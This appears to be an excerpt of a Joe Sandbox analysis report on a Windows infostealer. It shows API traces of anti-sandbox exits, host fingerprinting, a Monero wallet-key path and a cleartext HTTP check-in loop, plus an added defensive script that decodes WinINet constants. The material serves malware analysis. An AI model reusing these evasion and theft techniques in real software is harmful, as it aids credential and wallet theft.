                              • Instruction ID: ae70068cc568cd188bc473f7415d8023a4127bd79bee7c7ceb7b991ac19d887d
                              • Opcode Fuzzy Hash: 3ecfc28f7235a802a4f482d3145b7a8160af779e7db8383a6249bea6eb34cb07
                              • Instruction Fuzzy Hash: F7715F71A00218ABDB25EFA0DC49FEE77B8FF64704F508199F1096B190DBB4AA85CF51
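The function at 001B6280 is the sample's HTTP fetch routine: InternetCrackUrlA (inside 001B47B0) splits the URL, then InternetOpenA, InternetConnectA, HttpOpenRequestA, an optional InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA and an InternetReadFile loop run in order, and the result is compared with the string ERROR. The numeric arguments Joe Sandbox prints are WinINet constants. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the trace lines copied from the APIs block above and expands the constants with the values from wininet.h. What falls out of it: dwService 3 is INTERNET_SERVICE_HTTP; the HttpOpenRequestA flags 0x00400100 are INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, with INTERNET_FLAG_SECURE absent, so as traced the fetch goes out as cleartext HTTP and its GET path and status code are visible on the wire; option 0x1F is INTERNET_OPTION_SECURITY_FLAGS, reached only on one branch and with the written value not captured ('?'); 0x13 is HTTP_QUERY_STATUS_CODE; 0x7CF is a 1999-byte read chunk. Host, port and path were not captured, so the script does not guess them.

```python
"""Decode the WinINet constants in a Joe Sandbox API trace.

Added example, not part of the Joe Sandbox report or of the sample:
the trace lines below are copied from the APIs block of the function
at 001B6280; the constant values come from wininet.h.
"""
import re
from dataclasses import dataclass, field

# Trace lines copied from the report (function 001B6280).
TRACE = """
• InternetOpenA.WININET(001D0DFE,00000001,00000000,00000000,00000000), ref: 001B62E1
• StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6303
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B6335
• HttpOpenRequestA.WININET(00000000,GET,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B6385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001B63BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001B63D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001B63FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001B646D
• InternetCloseHandle.WININET(00000000), ref: 001B64EF
• InternetCloseHandle.WININET(00000000), ref: 001B64F9
• InternetCloseHandle.WININET(00000000), ref: 001B6503
"""

LINE_RE = re.compile(r"•\s+(\w+)\.(\w+)(?:\((.*?)\))?,?\s+ref:\s*([0-9A-Fa-f]+)")

# Values from wininet.h (Windows SDK).
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS",
                   41: "INTERNET_OPTION_USER_AGENT"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE",
              22: "HTTP_QUERY_RAW_HEADERS_CRLF"}
INTERNET_FLAGS = {  # bitmask used by HttpOpenRequestA dwFlags
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    decoded: dict = field(default_factory=dict)


def arg(a, i):
    """Argument i of a call, or '?' when the trace did not record it."""
    return a[i] if i < len(a) else "?"


def as_int(value):
    """Joe Sandbox prints DWORD arguments as 8 hex digits; '?' means not captured."""
    try:
        return int(value, 16)
    except ValueError:
        return None


def flag_names(value, table):
    """Expand a bitmask into constant names; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    leftover = value & ~sum(table)
    return names + ([f"0x{leftover:08X}"] if leftover else [])


def decode(call):
    """Attach constant names to the arguments whose meaning is fixed by the API."""
    a, d = call.args, call.decoded
    if call.api == "InternetOpenA":
        d["access_type"] = INTERNET_OPEN_TYPE.get(as_int(arg(a, 1)), arg(a, 1))
    elif call.api == "InternetConnectA":          # port is arg 2, '?' in this trace
        d["service"] = INTERNET_SERVICE.get(as_int(arg(a, 5)), arg(a, 5))
    elif call.api == "HttpOpenRequestA":
        d["verb"] = arg(a, 1)
        d["flags"] = flag_names(as_int(arg(a, 6)) or 0, INTERNET_FLAGS)
    elif call.api == "InternetSetOptionA":
        d["option"] = INTERNET_OPTION.get(as_int(arg(a, 1)), arg(a, 1))
        d["value"] = arg(a, 2)                     # '?' = the written DWORD was not captured
    elif call.api == "HttpQueryInfoA":
        d["info_level"] = HTTP_QUERY.get(as_int(arg(a, 1)), arg(a, 1))
    elif call.api == "InternetReadFile":
        d["chunk_bytes"] = as_int(arg(a, 2))
    return call


def decode_trace(text):
    calls = []
    for m in LINE_RE.finditer(text):
        api, module, rawargs, ref = m.groups()
        calls.append(decode(Call(api, module, rawargs.split(",") if rawargs else [], ref)))
    return calls


def findings(calls):
    """Conclusions that follow from the decoded constants alone."""
    by_api = {c.api: c for c in calls}
    out = {}
    if "HttpOpenRequestA" in by_api:
        secure = "INTERNET_FLAG_SECURE" in by_api["HttpOpenRequestA"].decoded["flags"]
        out["transport"] = "https" if secure else "http (INTERNET_FLAG_SECURE not set)"
    if "InternetSetOptionA" in by_api:
        opt = by_api["InternetSetOptionA"].decoded
        out["option_set"] = f'{opt["option"]} = {opt["value"]}'
    if "HttpQueryInfoA" in by_api:
        out["reads_status_code"] = by_api["HttpQueryInfoA"].decoded["info_level"] == "HTTP_QUERY_STATUS_CODE"
    if "InternetReadFile" in by_api:
        out["read_chunk_bytes"] = by_api["InternetReadFile"].decoded["chunk_bytes"]
    return out


if __name__ == "__main__":
    calls = decode_trace(TRACE)
    for c in calls:
        print(f"{c.ref}  {c.api:<20} {c.decoded}")
    print(findings(calls))
```

The parser accepts any APIs block on this page (the "ref:" column is what it keys on), but only the WinINet arguments are decoded; the "Part of subcall function" prefix is not handled here.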

                               Control-flow Graph
                               • Rendered graph not reproduced. Recoverable structure: function 001C5510 to 001C5AC6. After setup (001C5510-001C5577: call 001C5AD0, three calls to 001CA820, four to 001CA740) the loop head at 001C557C runs three similar stages. Each stage takes one of two request paths (call 001B1590 then 001C51F0, or two calls to 001CA740, 001B1590 then 001C52C0), frees temporaries via 001CA8A0/001CA800, and tests the result with StrCmpCA against ERROR (001C5644/001C56A1, 001C578B/001C5857, 001C5940/001C5A0C). One outcome of each comparison leaves through the cleanup block (001CA8A0, 001CA820, 001B1670, 001CA800, 001C6560, 001B1550) to the return at 001C5AC3; the other continues. After the third stage, Sleep(0xEA60) at 001C5A16 precedes a jump back to 001C557C.
                              APIs
                                • Part of subcall function 001CA820: lstrlen.KERNEL32(001B4F05,?,?,001B4F05,001D0DDE), ref: 001CA82B
                                • Part of subcall function 001CA820: lstrcpy.KERNEL32(001D0DDE,00000000), ref: 001CA885
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C5857
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C5228
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C5318
                                • Part of subcall function 001C52C0: lstrlen.KERNEL32(00000000), ref: 001C532F
                                • Part of subcall function 001C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 001C5364
                                • Part of subcall function 001C52C0: lstrlen.KERNEL32(00000000), ref: 001C5383
                                • Part of subcall function 001C52C0: lstrlen.KERNEL32(00000000), ref: 001C53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 001C5A1B
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 73a2c1852a49511039e48de74242db16ecf26e98c193f27ec9b6bf420dff84f5
                              • Instruction ID: 13fc33d9a7f14a86cd432373f1159ff98ab4b574b7870a7f71be1b6b6a9ba8cf
                              • Opcode Fuzzy Hash: 73a2c1852a49511039e48de74242db16ecf26e98c193f27ec9b6bf420dff84f5
                              • Instruction Fuzzy Hash: 70E1FB71910608ABCB16FBA0DC56FFD737DAF74345F90812CA40666191EF34EA49CBA2

                               Control-flow Graph
                               • Rendered graph not reproduced. Recoverable structure: function 001C17A0 to 001C19CD. A first StrCmpCA (001C17A0-001C17CD, after a call to 001CA8AD0 is corrected to 001CAAD0) against block leads to ExitProcess at 001C17CF; otherwise a second call to 001CAAD0 (001C17D7) enters a loop headed at 001C17F4. The loop body at 001C1817 is a thirteen-way dispatch: nine arms each perform one StrCmpCA (001C185D, 001C187F, 001C18AD, 001C18CF, 001C18F1, 001C1913, 001C1932, 001C1951, 001C1970) and four arms call 001CA820 (001C1821, 001C1835, 001C1849, 001C198F); the strings compared in those arms were not captured. All arms rejoin at 001C199E, and the loop exits through 001CA800 at 001C19C2.
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 001C17C5
                              • ExitProcess.KERNEL32 ref: 001C17D1
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: f51f3a6796b0ba96f66960cfd47f2fc629c2b8e1697615acc529e54cdb24b72f
                              • Instruction ID: 04ecc03b3361d9af08ff226894a092230e33923188ad8cddd490bf38055b1364
                              • Opcode Fuzzy Hash: f51f3a6796b0ba96f66960cfd47f2fc629c2b8e1697615acc529e54cdb24b72f
                              • Instruction Fuzzy Hash: 945137B4A4420AFBCB05DFA0D954FBE77BAAF69708F10804DE40AA7241D770E951CB62

                               Control-flow Graph
                               • Rendered graph not reproduced. Recoverable structure: function 001C7500 to 001C768E. GetWindowsDirectoryA (001C7500-001C754A); GetVolumeInformationA followed by three calls to 001C8D00 (001C7553-001C75C7); a loop at 001C75D8 that calls 001C8D00 (001C75E1); then GetProcessHeap and RtlAllocateHeap (001C75FC), after which either wsprintfA and a call to 001CA740 (001C7628) or a direct call to 001CA740 (001C7619) runs, joining at 001C767E.
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001C7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001C757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C760A
                              • wsprintfA.USER32 ref: 001C7640
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 34d26a7a8db53330c5066fbee7b69f927fc1312033048976dc9ac9051189d659
                              • Instruction ID: 35587ad0afe6efae2ccecc504e528f79570b206ef4a29cff1b8f0bdbb2852daa
                              • Opcode Fuzzy Hash: 34d26a7a8db53330c5066fbee7b69f927fc1312033048976dc9ac9051189d659
                              • Instruction Fuzzy Hash: 3F4182B1D04258ABDB11DF94DC85FEEBBB8AF28704F10019DF509A7280DB75AA44CFA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0590), ref: 001C98A1
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0608), ref: 001C98BA
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0668), ref: 001C98D2
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE05A8), ref: 001C98EA
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0728), ref: 001C9903
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE8B48), ref: 001C991B
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00ED53E8), ref: 001C9933
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00ED5348), ref: 001C994C
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0770), ref: 001C9964
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE05C0), ref: 001C997C
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE07E8), ref: 001C9995
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE05D8), ref: 001C99AD
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00ED5388), ref: 001C99C5
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0680), ref: 001C99DE
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001B11D0: ExitProcess.KERNEL32 ref: 001B1211
                                • Part of subcall function 001B1160: GetSystemInfo.KERNEL32(?), ref: 001B116A
                                • Part of subcall function 001B1160: ExitProcess.KERNEL32 ref: 001B117E
                                • Part of subcall function 001B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001B112B
                                • Part of subcall function 001B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 001B1132
                                • Part of subcall function 001B1110: ExitProcess.KERNEL32 ref: 001B1143
                                • Part of subcall function 001B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001B123E
                                • Part of subcall function 001B1220: __aulldiv.LIBCMT ref: 001B1258
                                • Part of subcall function 001B1220: __aulldiv.LIBCMT ref: 001B1266
                                • Part of subcall function 001B1220: ExitProcess.KERNEL32 ref: 001B1294
                                • Part of subcall function 001C6770: GetUserDefaultLangID.KERNEL32 ref: 001C6774
                                • Part of subcall function 001B1190: ExitProcess.KERNEL32 ref: 001B11C6
                                • Part of subcall function 001C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001B11B7), ref: 001C7880
                                • Part of subcall function 001C7850: RtlAllocateHeap.NTDLL(00000000), ref: 001C7887
                                • Part of subcall function 001C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001C789F
                                • Part of subcall function 001C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7910
                                • Part of subcall function 001C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001C7917
                                • Part of subcall function 001C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001C792F
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00EE8AE8,?,001D110C,?,00000000,?,001D1110,?,00000000,001D0AEF), ref: 001C6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001C6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 001C6AF9
                              • Sleep.KERNEL32(00001770), ref: 001C6B04
                              • CloseHandle.KERNEL32(?,00000000,?,00EE8AE8,?,001D110C,?,00000000,?,001D1110,?,00000000,001D0AEF), ref: 001C6B1A
                              • ExitProcess.KERNEL32 ref: 001C6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 6e3b8419a964d10257fa638f0ff3b832ed8bc8e7158193ba4ac0ef5001af20a8
                              • Instruction ID: 07bef2ea587ba9bc1bc829b2b07a748a2f8fc51b42d8ec3e6f88a04b7821e9a3
                              • Opcode Fuzzy Hash: 6e3b8419a964d10257fa638f0ff3b832ed8bc8e7158193ba4ac0ef5001af20a8
                              • Instruction Fuzzy Hash: 6B31D671A40208ABDB06FBF0DC56FEE7778AF34345F90451CF212A6192DF70A905CAA6

                              Control-flow Graph (basic blocks and edges recovered from the graph data; the executed/not-executed colouring of the rendered image is not preserved)
                              • 1b1220-1b1247: call 1c89b0; GlobalMemoryStatusEx -> 1b1249-1b1271, 1b1273-1b127a
                              • 1b1249-1b1271: call 1cda00 x2 (the two __aulldiv calls at 001B1258 and 001B1266) -> 1b1281-1b1285
                              • 1b1273-1b127a -> 1b1281-1b1285
                              • 1b1281-1b1285 -> 1b129a-1b129d, 1b1287
                              • 1b1287 -> 1b1289-1b1290, 1b1292-1b1294
                              • 1b1289-1b1290 -> 1b129a-1b129d, 1b1292-1b1294
                              • 1b1292-1b1294: ExitProcess
                              • 1b129a-1b129d (no outgoing edge)
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001B123E
                              • __aulldiv.LIBCMT ref: 001B1258
                              • __aulldiv.LIBCMT ref: 001B1266
                              • ExitProcess.KERNEL32 ref: 001B1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 6a2f6a5acff36a5a84774016df0f1fc0a26c10c370ac6a87a4f8d3cd98d7a6f6
                              • Instruction ID: 78c489a587c92ed2b8ac33cc51b45b718ca8cd9ceed1f7fc8aa4599d6419d2e8
                              • Opcode Fuzzy Hash: 6a2f6a5acff36a5a84774016df0f1fc0a26c10c370ac6a87a4f8d3cd98d7a6f6
                              • Instruction Fuzzy Hash: 19014FB0940308BAEB10DBE0DC59BAEB778AB14745F608058E605B6180D774A5458799

                              Control-flow Graph (basic blocks and edges recovered from the graph data; the executed/not-executed colouring of the rendered image is not preserved)
                              • 1c6af3 -> 1c6b0a
                              • 1c6b0a -> 1c6aba-1c6ad7, 1c6b0c-1c6b22
                              • 1c6aba-1c6ad7: call 1caad0; OpenEventA -> 1c6ad9-1c6af1, 1c6af5-1c6b04
                              • 1c6ad9-1c6af1: call 1caad0; CreateEventA -> 1c6b0c-1c6b22
                              • 1c6af5-1c6b04: CloseHandle; Sleep -> 1c6b0a (loops back to the OpenEventA check)
                              • 1c6b0c-1c6b22: call 1c6920; call 1c5b10; CloseHandle; ExitProcess
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00EE8AE8,?,001D110C,?,00000000,?,001D1110,?,00000000,001D0AEF), ref: 001C6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001C6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 001C6AF9
                              • Sleep.KERNEL32(00001770), ref: 001C6B04
                              • CloseHandle.KERNEL32(?,00000000,?,00EE8AE8,?,001D110C,?,00000000,?,001D1110,?,00000000,001D0AEF), ref: 001C6B1A
                              • ExitProcess.KERNEL32 ref: 001C6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: bf0a4065befcb2a8848a18de75b71384b549c38048b456c011c850f37f8b2095
                              • Instruction ID: 2550601647333f86607ae48ff620a946cad08009826d6ac52d01492e4fa70396
                              • Opcode Fuzzy Hash: bf0a4065befcb2a8848a18de75b71384b549c38048b456c011c850f37f8b2095
                              • Instruction Fuzzy Hash: 48F05EB0A40209AFE701ABA0DC06FBE7B78EF34701F10451CF516A21C1DBB0E940DA97

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: dfa2cd9f764639c50c7e4815ab3c11c981be28fa90be44c0d67e56d6b8620e20
                              • Instruction ID: b8e927cc234dc70262ca6332e1c4f4e1ef6b019b6759e703881a74c309da93e5
                              • Opcode Fuzzy Hash: dfa2cd9f764639c50c7e4815ab3c11c981be28fa90be44c0d67e56d6b8620e20
                              • Instruction Fuzzy Hash: 45215EB1D00209ABDF10EFA5EC45BDE7B74FF14320F108629F915A7291EB706A09CB81

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B6280: InternetOpenA.WININET(001D0DFE,00000001,00000000,00000000,00000000), ref: 001B62E1
                                • Part of subcall function 001B6280: StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6303
                                • Part of subcall function 001B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B6335
                                • Part of subcall function 001B6280: HttpOpenRequestA.WININET(00000000,GET,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B6385
                                • Part of subcall function 001B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001B63BF
                                • Part of subcall function 001B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001B63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
